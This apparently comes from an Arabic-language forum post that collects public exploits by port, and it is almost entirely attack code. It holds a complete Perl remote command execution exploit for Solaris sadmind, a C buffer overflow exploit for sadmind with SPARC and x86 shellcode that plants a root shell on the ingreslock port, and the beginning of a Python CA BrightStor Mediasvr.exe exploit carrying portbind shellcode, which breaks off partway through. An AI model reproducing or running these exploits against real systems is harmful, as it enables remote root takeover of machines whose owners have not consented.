fprintf (stderr, "Usage: %s <host>\n\n", argv[0]);
exit (EXIT_SUCCESS);
}
formatme (argv[1]);
}
// [2007-02-18]
انتهينا من بورت 110
نبداء بـ بورت 111
111 Solaris Sadmind Default Configuration Remote Root Exploit
#!/usr/bin/perl -w
##################
##
# Title: rootdown.pl
# Purpose: Solaris Remote command executiong via sadmind
# Author: H D Moore hdm at metasploit.com
# Copyright: Copyright (C) 2003 METASPLOIT.COM
##
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
use Getopt::Std;
my $VERSION = "1.0";
my %opts;
getopts("h:p:c:r:iv", \%opts);
if ($opts{v}) { show_info() }
if (! $opts{h}) { usage() }
my $target_host = $opts{h};
my $target_name = "exploit";
my $command = $opts{c} ? $opts{c} : "touch /tmp/OWNED_BY_SADMIND_\$\$";
my $portmap = $opts{r} ? $opts{r} : 111;
##
# Determine the port used by sadmind
##
my $target_port = $opts{p} ? $opts{p} : rpc_getport($target_host, $portmap, 100232, 10);
if (! $target_port)
{
print STDERR "Error: could not determine port used by sadmind\n";
exit(0);
}
##
# Determine the hostname of the target
##
my $s = rpc_socket($target_host, $target_port);
my $x = rpc_sadmin_exec($target_name, "id");
print $s $x;
my $r = rpc_read($s);
close ($s);
if ($r && $r =~ m/Security exception on host (.*)\. USER/)
{
$target_name = $1;
} else {
print STDERR "Error: could not obtain target hostname.\n";
exit(0);
}
##
# Execute commands :)
##
my $interactive = 0;
if ($opts{i}) { $interactive++ }
do {
if ($opts{i}) { $command = command_prompt() } else
{
print STDERR "Executing command on '$target_name' via port $target_port\n";
}
$s = rpc_socket($target_host, $target_port);
$x = rpc_sadmin_exec($target_name, $command);
print $s $x;
$r = rpc_read($s);
close ($s);
if ($r)
{
# Command Failed
if (length($r) == 36 && substr($r, 24, 4) eq "\x00\x00\x00\x29")
{
print STDERR "Error: something went wrong with the RPC format.\n";
exit(0);
}
# Command might have failed
if (length($r) == 36 && substr($r, 24, 4) eq "\x00\x00\x00\x2b")
{
print STDERR "Error: something may have gone wrong with the sadmind format\n";
}
# Confirmed success
if (length($r) == 36 && substr($r, 24, 12) eq ("\x00" x 12))
{
print STDERR "Success: your command has been executed successfully.\n";
}
if (length($r) != 36) { print STDERR "Unknown Response: $r\n" }
} else {
print STDERR "Error: no response recieved, you may want to try again.\n";
exit(0);
}
} while ($interactive);
exit(0);
sub usage {
print STDERR "\n";
print STDERR "+-----==[ rootdown.pl => Solaris SADMIND Remote Command Execution\n\n";
print STDERR " Usage: $0 -h <target> -c <command> [options]\n";
print STDERR " Options:\n";
print STDERR " -i\tStart interactive mode (for multiple commands)\n";
print STDERR " -p\tAvoid the portmapper and use this sadmind port\n";
print STDERR " -r\tQuery alternate portmapper on this UDP port\n";
print STDERR " -v\tDisplay information about this exploit\n";
print STDERR "\n\n";
exit(0);
}
sub show_info {
print "\n\n";
print " Name: rootdown.pl\n";
print " Author: H D Moore <hdm\@metasploit.com>\n";
print "Version: $VERSION\n\n";
# not finsihed :)
"This exploit targets a weakness in the default security settings
of the sadmind RPC application. This application is installed and
enabled by default on most versions of the Solaris operating
system.\n\n".
"The sadmind application defaults to a weak security mode known as
AUTH_SYS (or AUTH_UNIX under Linux/BSD). When running in this mode,
the service will accept a structure containing the user and group
IDs as well as the originating system name. These values are not
validated in any form and are completely controlled by the client.
If the standard sadmin RPC API calls are used to generate the request,
the ADM_CLIENT_HOST parameter is filled in with the hostname of the
client system. If the RPC packet is modified so that this field is
set to the hostname of the remote system, it will be processed as
if it was a local request. If the user ID is set to zero or the
value of any user in the sysadmin group, it is possible to call
arbitrary methods in any class available to sadmind.\n\n".
"If the Solstice AdminSuite client software has not been installed,
the only class available is 'system', which only contains a single
method called 'admpipe'. The strings within this program seem to
suggest that it can be used run arbitrary commands, however I chose
a different method of command execution. Since each method is simply
an executable in the class directory, it is possible to use a
standard directory traversal attack to execute any application.
We can pass arguments to these methods using the standard API.
An example of spawning a shell which executes the 'id' command:
# apm -c system -m ../../../../../bin/sh -a arg1=-c arg2=id\n\n".
"To exploit this vulnerability, we must create a RPC packet that
calls the '/bin/sh' method, passing it the parameter of the command
we want to execute. To do this, packet dumps of the 'apm' tool
were obtained and the format was slowly mapped. The hostname of
the target system must be known for this exploit to work, however
when sadmind is called with the wrong name, it replies with a
'ACCESS DENIED' error message containing the correct name. The
final code does the following:
1) Queries the portmapper to determine the sadmind port
2) Sends an invalid request to sadmind to obtain the hostname
3) Uses the hostname to forge the RPC packet and execute commands
This vulnerability was reported by Mark Zielinski and disclosed by iDefense.
Related URLs:
- http://www.idefense.com/advisory/09.16.03.txt
- http://docs.sun.com/db/doc/816-0211/6m6nc676b?a=view
";
exit(0);
}
sub command_prompt {
select(STDOUT); $|++;
print STDOUT "\nsadmind> ";
my $command = <STDIN>;
chomp($command);
if (! $command || lc($command) eq "quit" || lc($command) eq "exit")
{
print "\nExiting interactive mode...\n";
exit(0);
}
return ($command)
}
sub rpc_socket {
my ($target_host, $target_port) = @_;
my $s = IO::Socket::INET->new
(
PeerAddr => $target_host,
PeerPort => $target_port,
Proto => "udp",
Type => SOCK_DGRAM
);
if (! $s)
{
print "\nError: could not create socket to target: $!\n";
exit(0);
}
select($s); $|++;
select(STDOUT); $|++;
nonblock($s);
return($s);
}
sub rpc_read {
my ($s) = @_;
my $sel = IO::Select->new($s);
my $res;
my @fds = $sel->can_read(4);
foreach (@fds) { $res .= <$s>; }
return $res;
}
sub nonblock {
my ($fd) = @_;
my $flags = fcntl($fd, F_GETFL,0);
fcntl($fd, F_SETFL, $flags|O_NONBLOCK);
}
sub rpc_getport {
my ($target_host, $target_port, $prog, $vers) = @_;
my $s = rpc_socket($target_host, $target_port);
my $portmap_req =
pack("L", rand() * 0xffffffff) . # XID
"\x00\x00\x00\x00". # Call
"\x00\x00\x00\x02". # RPC Version
"\x00\x01\x86\xa0". # Program Number (PORTMAP)
"\x00\x00\x00\x02". # Program Version (2)
"\x00\x00\x00\x03". # Procedure (getport)
("\x00" x 16). # Credentials and Verifier
pack("N", $prog) .
pack("N", $vers).
pack("N", 0x11). # Protocol: UDP
pack("N", 0x00); # Port: 0
print $s $portmap_req;
my $r = rpc_read($s);
close ($s);
if (length($r) == 28)
{
my $prog_port = unpack("N",substr($r, 24, 4));
return($prog_port);
}
return undef;
}
sub rpc_sadmin_exec {
my ($hostname, $command) = @_;
my $packed_host = $hostname . ("\x00" x (59 - length($hostname)));
my $rpc =
pack("L", rand() * 0xffffffff) . # XID
"\x00\x00\x00\x00". # Call
"\x00\x00\x00\x02". # RPC Version
"\x00\x01\x87\x88". # Program Number (SADMIND)
"\x00\x00\x00\x0a". # Program Version (10)
"\x00\x00\x00\x01". # Procedure
"\x00\x00\x00\x01"; # Credentials (UNIX)
# Auth Length is filled in
# pad it up to multiples of 4
my $rpc_hostname = $hostname;
while (length($rpc_hostname) % 4 != 0) { $rpc_hostname .= "\x00" }
my $rpc_auth =
# Time Stamp
pack("N", time() + 20001) .
# Machine Name
pack("N", length($hostname)) . $rpc_hostname .
"\x00\x00\x00\x00". # UID = 0
"\x00\x00\x00\x00". # GID = 0
"\x00\x00\x00\x00"; # No Extra Groups
$rpc .= pack("N", length($rpc_auth)) . $rpc_auth . ("\x00" x 8);
my $header =
# Another Time Stamp
reverse(pack("L", time() + 20005)) .
"\x00\x07\x45\xdf".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04".
"\x7f\x00\x00\x01". # 127.0.0.1
"\x00\x01\x87\x88". # SADMIND
"\x00\x00\x00\x0a\x00\x00\x00\x04".
"\x7f\x00\x00\x01". # 127.0.0.1
"\x00\x01\x87\x88". # SADMIND
"\x00\x00\x00\x0a\x00\x00\x00\x11\x00\x00\x00\x1e".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00".
"\x00\x00\x00\x3b". $packed_host.
"\x00\x00\x00\x00\x06" . "system".
"\x00\x00\x00\x00\x00\x15". "../../../../../bin/sh". "\x00\x00\x00";
# Append Body Length ^-- Here
my $body =
"\x00\x00\x00\x0e". "ADM_FW_VERSION".
"\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00".
"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x08". "ADM_LANG".
"\x00\x00\x00\x09\x00\x00\x00\x02\x00\x00".
"\x00\x01". "C" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0d". "ADM_REQUESTID".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x12\x00\x 00\x00\x11".
"0810:1010101010:1"."\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x09". "ADM_CLASS".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x07".
"\x00\x00\x00\x06" . "system" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0e" . "ADM_CLASS_VERS" .
"\x00\x00\x00\x00\x00\x09\x00\x00\x00\x04".
"\x00\x00\x00\x03". "2.1".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0a" . "ADM_METHOD" .
"\x00\x00\x00\x00\x00\x09\x00\x00\x00\x16".
"\x00\x00\x00\x15". "../../../../../bin/sh" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x08". "ADM_HOST" .
"\x00\x00\x00\x09\x00\x00\x00\x3c\x00\x00\x00\x3b".
$packed_host.
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0f". "ADM_CLIENT_HOST".
"\x00\x00\x00\x00\x09".
pack("N", length($hostname) + 1) .
pack("N", length($hostname)) .
$rpc_hostname .
"\x00\x00\x00\x00". "\x00\x00\x00\x00".
"\x00\x00\x00\x11" . "ADM_CLIENT_DOMAIN".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x01\x00\x 00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x11" . "ADM_TIMEOUT_PARMS".
"\x00\x00\x00\x00\x00".
"\x00\x09\x00\x00\x00\x1c".
"\x00\x00\x00\x1b" . "TTL=0 PTO=20 PCNT=2 PDLY=30".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x09" . "ADM_FENCE" .
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x 00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x01\x58\x00\x00\x00\x00\x 00\x00\x09\x00".
"\x00\x00\x03\x00\x00\x00\x02" . "-c" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x01\x59\x00".
"\x00\x00\x00\x00\x00\x09\x00\x00\x02\x01\x00\x00\x 02\x00".
$command . ("\x00" x (512 - length($command))).
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10".
"netmgt_endofargs";
my $res = $rpc . $header . pack("N", (length($body) + 4 + length($header)) - 330) . $body;
return($res);
}
# [2003-09-19]
111 Solaris sadmind Remote Buffer Overflow Exploit
/************************************************** ***********************\
** **
** Super Solaris sadmin Exploit by optyx <[email protected]> **
** based on sadminsparc. and sadminx86.c by Cheez Whiz **
** **
\************************************************* ************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <rpc/rpc.h>
char shellsparc[] =
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff"
"\x90\x03\xe0\x5c\x92\x22\x20\x10\x94\x1b\xc0\x0f"
"\xec\x02\x3f\xf0\xac\x22\x80\x16\xae\x02\x60\x10"
"\xee\x22\x3f\xf0\xae\x05\xe0\x08\xc0\x2d\xff\xff"
"\xee\x22\x3f\xf4\xae\x05\xe0\x03\xc0\x2d\xff\xff"
"\xee\x22\x3f\xf8\xae\x05\xc0\x16\xc0\x2d\xff\xff"
"\xc0\x22\x3f\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff"
"\x2d\x63\xff";
char shellx86[] =
"\xeb\x45\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31"
"\xc0\x89\x46\xb7\x88\x46\xbc\x31\xc0\x50\x56\x8b"
"\x1e\xf7\xdb\x89\xf7\x83\xc7\x10\x57\x89\x3e\x83"
"\xc7\x08\x88\x47\xff\x89\x7e\x04\x83\xc7\x03\x88"
"\x47\xff\x89\x7e\x08\x01\xdf\x88\x47\xff\x89\x46"
"\x0c\xb0\x3b\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
"\xbe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\x2f\x62\x69\x6e"
"\x2f\x73\x68\xff\x2d\x63\xff";
int buflen[] = { 1076, 1056 };
int addrlen[] = { 560, 8 };
int lens[] = { 84, 76 };
int offset[] = { 688, 572 };
int alignment[] = { 4, 0 };
long int nops[] = { 0x801bc00f, 0x90 };
int junks[] = { 512, 536 };
char command[] = "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' "
"> /tmp/.x; /usr/sbin/inetd -s /tmp/.x; rm -f /tmp/.x;";
unsigned long int sp[] = { 0xefff9580, 0xefff9418, 0x080418ec, 0x08041798 };
#define FRAMELEN1 608
#define FRAMELEN2 4200
#define NETMGT_PROG 100232
#define NETMGT_VERS 10
#define NETMGT_PROC_PING 0
#define NETMGT_PROC_SERVICE 1
#define NETMGT_UDP_PING_TIMEOUT 30
#define NETMGT_UDP_PING_RETRY_TIMEOUT 5
#define NETMGT_UDP_SERVICE_TIMEOUT 1
#define NETMGT_UDP_SERVICE_RETRY_TIMEOUT 2
#define NETMGT_HEADER_TYPE 6
#define NETMGT_ARG_INT 3
#define NETMGT_ARG_STRING 9
#define NETMGT_ENDOFARGS "netmgt_endofargs"
#define FW_VERSION "VERSION"
#define CLIENT_DOMAIN "CLIENT_DOMAIN"
#define FENCE "FENCE"
struct nm_send_header {
struct timeval timeval1;
struct timeval timeval2;
struct timeval timeval3;
unsigned int uint1;
unsigned int uint2;
unsigned int uint3;
unsigned int uint4;
unsigned int uint5;
struct in_addr inaddr1;
struct in_addr inaddr2;
unsigned long ulong1;
unsigned long ulong2;
struct in_addr inaddr3;
unsigned long ulong3;
unsigned long ulong4;
unsigned long ulong5;
struct timeval timeval4;
unsigned int uint6;
struct timeval timeval5;
char *string1;
char *string2;
char *string3;
unsigned int uint7;
};
struct nm_send_arg_int {
char *string1;
unsigned int uint1;
unsigned int uint2;
int int1;
unsigned int uint3;
unsigned int uint4;
};
struct nm_send_arg_string {
char *string1;
unsigned int uint1;
unsigned int uint2;
char *string2;
unsigned int uint3;
unsigned int uint4;
};
struct nm_send_footer {
char *string1;
};
struct nm_send {
struct nm_send_header header;
struct nm_send_arg_int version;
struct nm_send_arg_string string;
struct nm_send_arg_int fence;
struct nm_send_footer footer;
};
struct nm_reply {
unsigned int uint1;
unsigned int uint2;
char *string1;
};
bool_t xdr_nm_send_header(XDR *xdrs, struct nm_send_header *objp)
{
char *addr;
size_t size = sizeof(struct in_addr);
if(!xdr_long(xdrs, &objp->timeval1.tv_sec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval1.tv_usec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval2.tv_sec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval2.tv_usec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval3.tv_sec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval3.tv_usec))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint2))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint3))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint4))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint5))
return (FALSE);
addr = (char *) &objp->inaddr1.s_addr;
if(!xdr_bytes(xdrs, &addr, &size, size))
return (FALSE);
if(!xdr_u_long(xdrs, &objp->ulong1))
return (FALSE);
if(!xdr_u_long(xdrs, &objp->ulong2))
return (FALSE);
if(!xdr_u_long(xdrs, &objp->ulong3))
return (FALSE);
if(!xdr_u_long(xdrs, &objp->ulong4))
return (FALSE);
if(!xdr_u_long(xdrs, &objp->ulong5))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval4.tv_sec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval4.tv_usec))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint6))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval5.tv_sec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval5.tv_usec))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->string2))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->string3))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint7))
return (FALSE);
return (TRUE);
}
bool_t xdr_nm_send_arg_int(XDR *xdrs, struct nm_send_arg_int *objp)
{
if(!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint2))
return (FALSE);
if(!xdr_int(xdrs, &objp->int1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint3))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint4))
return (FALSE);
return (TRUE);
}
bool_t xdr_nm_send_arg_string(XDR *xdrs, struct nm_send_arg_string *objp)
{
if(!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint2))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->string2))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint3))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint4))
return (FALSE);
return (TRUE);
}
bool_t xdr_nm_send_footer(XDR *xdrs, struct nm_send_footer *objp)
{
if(!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
return (TRUE);
}
bool_t xdr_nm_send(XDR *xdrs, struct nm_send *objp)
{
if(!xdr_nm_send_header(xdrs, &objp->header))
return (FALSE);
if(!xdr_nm_send_arg_int(xdrs, &objp->version))
return (FALSE);
if(!xdr_nm_send_arg_string(xdrs, &objp->string))
return (FALSE);
if(!xdr_nm_send_arg_int(xdrs, &objp->fence))
return (FALSE);
if(!xdr_nm_send_footer(xdrs, &objp->footer))
return (FALSE);
return (TRUE);
}
bool_t xdr_nm_reply(XDR *xdrs, struct nm_reply *objp)
{
if(!xdr_u_int(xdrs, &objp->uint1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint2))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
return (TRUE);
}
void usage(char *prog)
{
fprintf(stderr, "usage: %s -t target -a arch [-s size]", prog);
fprintf(stderr, " [-i increment] [-p]\n");
fprintf(stderr, "\tarchitectures:\n");
fprintf(stderr, "\t0 - Solaris SPARC 2.6\n");
fprintf(stderr, "\t1 - Solaris SPARC 2.7 (7.0)\n");
fprintf(stderr, "\t2 - Solaris x86 2.6\n");
fprintf(stderr, "\t3 - Solaris x86 2.7 (7.0)\n\n");
exit(-1);
}
int exp(char *host, int arch, unsigned long int sp, int pinging)
{
CLIENT *cl;
struct nm_send send;
struct nm_reply reply;
struct timeval tm;
enum clnt_stat stat;
int c, i, len, slen, clen, junk, a;
char *cp, *buf;
unsigned long int addr, fp;
a = (int) arch / 2;
buf = (char *) malloc(buflen[a] + 1);
if(a)
{
/* Solaris x86 */
memset(buf, nops[a], buflen[a]);
junk = junks[arch - 2];
junk &= 0xfffffffc;
for (i = 0, cp = buf + alignment[a]; i < junk / 4; i++)
{
*cp++ = (sp >> 0) & 0xff;
*cp++ = (sp >> 8) & 0xff;
*cp++ = (sp >> 16) & 0xff;
*cp++ = (sp >> 24) & 0xff;
}
addr = sp + offset[a];
for (i = 0; i < addrlen[a] / 4; i++)
{
*cp++ = (addr >> 0) & 0xff;
*cp++ = (addr >> 8) & 0xff;
*cp++ = (addr >> 16) & 0xff;
*cp++ = (addr >> 24) & 0xff;
}
slen = strlen(shellx86);
clen = strlen(command);
len = clen;
len++;
len = -len;
shellx86[lens[a]+0] = (len >> 0) & 0xff;
shellx86[lens[a]+1] = (len >> 8) & 0xff;
shellx86[lens[a]+2] = (len >> 16) & 0xff;
shellx86[lens[a]+3] = (len >> 24) & 0xff;
cp = buf + buflen[a] - 1 - clen - slen;
memcpy(cp, shellx86, slen);
cp += slen;
memcpy(cp, command, clen);
cp += clen;
*cp = '\xff';
}
else
{
/* Solaris SPARC */
memset(buf, '\xff', buflen[a]);
fp = sp + FRAMELEN1 + FRAMELEN2;
fp &= 0xfffffff8;
addr = sp + offset[a];
addr &= 0xfffffffc;
for(i = 0, cp = buf + alignment[a]; i < addrlen[a] / 8; i++)
{
*cp++ = (fp >> 24) & 0xff;
*cp++ = (fp >> 16) & 0xff;
*cp++ = (fp >> 8) & 0xff;
*cp++ = (fp >> 0) & 0xff;
*cp++ = (addr >> 24) & 0xff;
*cp++ = (addr >> 16) & 0xff;
*cp++ = (addr >> 8) & 0xff;
*cp++ = (addr >> 0) & 0xff;
}
slen = strlen(shellsparc);
clen = strlen(command);
len = buflen[a] - 1 - clen - slen - addrlen[a] - alignment[a];
len &= 0xfffffffc;
for(i = 0; i < lens[a] / 4; i++)
{
*cp++ = (nops[a] >> 24) & 0xff;
*cp++ = (nops[a] >> 16) & 0xff;
*cp++ = (nops[a] >> 8) & 0xff;
*cp++ = (nops[a] >> 0) & 0xff;
}
len = clen;
len++;
len = -len;
shellsparc[lens[a]+0] = (len >> 24) & 0xff;
shellsparc[lens[a]+1] = (len >> 16) & 0xff;
shellsparc[lens[a]+2] = (len >> 8) & 0xff;
shellsparc[lens[a]+3] = (len >> 0) & 0xff;
memcpy(cp, shellsparc, slen);
cp += slen;
memcpy(cp, command, clen);
}
buf[buflen[a]] = '\0';
memset(&send, 0, sizeof(struct nm_send));
send.header.uint2 = NETMGT_HEADER_TYPE;
send.header.string1 = "";
send.header.string2 = "";
send.header.string3 = "";
send.header.uint7 =
strlen(FW_VERSION) + 1 +
(4 * sizeof(unsigned int)) + sizeof(int) +
strlen(CLIENT_DOMAIN) + 1 +
(4 * sizeof(unsigned int)) + strlen(buf) + 1 +
strlen(FENCE) + 1 +
(4 * sizeof(unsigned int)) + sizeof(int) +
strlen(NETMGT_ENDOFARGS) + 1;
send.version.string1 = FW_VERSION;
send.version.uint1 = NETMGT_ARG_INT;
send.version.uint2 = sizeof(int);
send.version.int1 = 1;
send.string.string1 = CLIENT_DOMAIN;
send.string.uint1 = NETMGT_ARG_STRING;
send.string.uint2 = strlen(buf);
send.string.string2 = buf;
send.fence.string1 = FENCE;
send.fence.uint1 = NETMGT_ARG_INT;
send.fence.uint2 = sizeof(int);
send.fence.int1 = 666;
send.footer.string1 = NETMGT_ENDOFARGS;
cl = clnt_create(host, NETMGT_PROG, NETMGT_VERS, "udp");
if (cl == NULL)
{
clnt_pcreateerror("clnt_create");
return 0;
}
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
if (!pinging)
{
tm.tv_sec = NETMGT_UDP_SERVICE_TIMEOUT;
tm.tv_usec = 0;
if (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm))
{
fprintf(stderr, "unable to set timeout\n");
exit(1);
}
tm.tv_sec = NETMGT_UDP_SERVICE_RETRY_TIMEOUT;
tm.tv_usec = 0;
if (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm))
{
fprintf(stderr, "unable to set timeout\n");
exit(1);
}
stat = clnt_call(cl, NETMGT_PROC_SERVICE,
xdr_nm_send, (caddr_t) &send,
xdr_nm_reply, (caddr_t) &reply, tm);
if (stat != RPC_SUCCESS)
{
clnt_perror(cl, "clnt_call");
fprintf(stdout, "now check if exploit worked;\n");
return 0;
}
fprintf(stderr, "exploit failed; "
"RPC succeeded and returned { %u, %u, \"%s\" }\n",
reply.uint1, reply.uint2, reply.string1);
clnt_destroy(cl);
exit(1);
}
else
{
tm.tv_sec = NETMGT_UDP_PING_TIMEOUT;
tm.tv_usec = 0;
if (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm))
{
fprintf(stderr, "unable to set timeout\n");
exit(1);
}
tm.tv_sec = NETMGT_UDP_PING_RETRY_TIMEOUT;
tm.tv_usec = 0;
if (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm))
{
fprintf(stderr, "unable to set timeout\n");
exit(1);
}
stat = clnt_call(cl, NETMGT_PROC_PING,
xdr_void, NULL,
xdr_void, NULL, tm);
if (stat != RPC_SUCCESS)
{
clnt_perror(cl, "clnt_call");
exit(1);
}
clnt_destroy(cl);
return 0;
}
}
int main(int argc, char *argv[])
{
int i, arch;
char *host = "";
int pinging = 0, inc = 4, size = 2048;
unsigned long int addr;
for(i=0;i<argc;i++)
{
if(!strcmp(argv[i], "-t"))
host = argv[i+1];
if(!strcmp(argv[i], "-a"))
arch = atoi(argv[i+1]);
if(!strcmp(argv[i], "-i"))
inc = atoi(argv[i+1]);
if(!strcmp(argv[i], "-s"))
size = atoi(argv[i+1]);
if(!strcmp(argv[i], "-p"))
pinging = 1;
}
if(arch > 3 || arch < 0)
usage(argv[0]);
if(size < 0)
usage(argv[0]);
if(inc < 0)
usage(argv[0]);
for(i = 0; i < size; i+=inc)
{
addr = sp[arch] + i;
exp(host, arch, addr, pinging);
addr = sp[arch] - i;
exp(host, arch, addr, pinging);
}
execl("telnet", host, "ingreslock");
return 0;
}
// [2000-12-01]
111 CA BrightStor Backup 11.5.2.0 (Mediasvr.exe) Remote Code Exploit
#!/usr/bin/python
#
# Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Code Exploit
# (Previously Unknown)
#
# There seems to be an design error in the handling of RPC data with xdr procedures
# across several .dll's imported by Mediasvr.exe. Four bytes from an RPC packet are
# processed as a particular address (xdr_handle_t data which is run through multiple bit
# shifts, and reversing of bytes), and eventually loaded into ECX.
#
# The 191 (0xbf) procedure, followed by nulls (at least 8 bytes of nulls, which may
# be Null Credentials and Auth?) leads to an exploitable condition.
#
# .text:0040AACD 008 mov ecx, [esp+8]
# .text:0040AAD1 008 mov dword_418820, esi
# .text:0040AAD7 008 push offset dword_418820
# .text:0040AADC 00C mov eax, [ecx]
# .text:0040AADE 00C call dword ptr [eax+2Ch]
#
# At this point, you have control of ECX (esp+8 is your address data). The data from the packet
# is stored in memory and is relatively static (see NOTE).
#
# The address is then loaded into EAX, and then called as EAX+2Ch, which is
# controllable data from the packet. In this code, I just jump ahead to
# the portbinding shellcode.
#
# NOTE: The only issue I have found is when the system is rebooted, the packet data
# appears at a higher memory location when Mediasvr.exe crashes
# and is restarted. I have accounted for this in the code, when the port that
# Mediasvr.exe is listening on is below TCP port 1100, which is usually only after
# a reboot
#
# This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the latest
# CA patches on Windows XP SP2 (I believe there is some issue with SP1, which
# is more then likely the memory locations)
#
# The patches include the following updates to Mediasvr.exe
# http://supportconnectw.ca.com/public/storage/infodocs/babimpsec-notice.asp
#
# CA has been notified
#
# Author: M. Shirk
# Tester: Tebodell
#
# (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail dot com
#
# Use at your own Risk: You have been warned
#------------------------------------------------------------------------
import os
import sys
import time
import socket
import struct
#------------------------------------------------------------------------
#Portbind shellcode; Binds shell on TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x36\x4b\x4e"
shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x46\x4b\x58"
shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x 4b\x48\x4e\x57"
shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x 4a\x51\x4b\x38"
shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x 46\x33\x4b\x58"
shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x 46\x48\x42\x4c"
shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x 44\x4c\x4b\x4e"
shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x 45\x4e\x4b\x48"
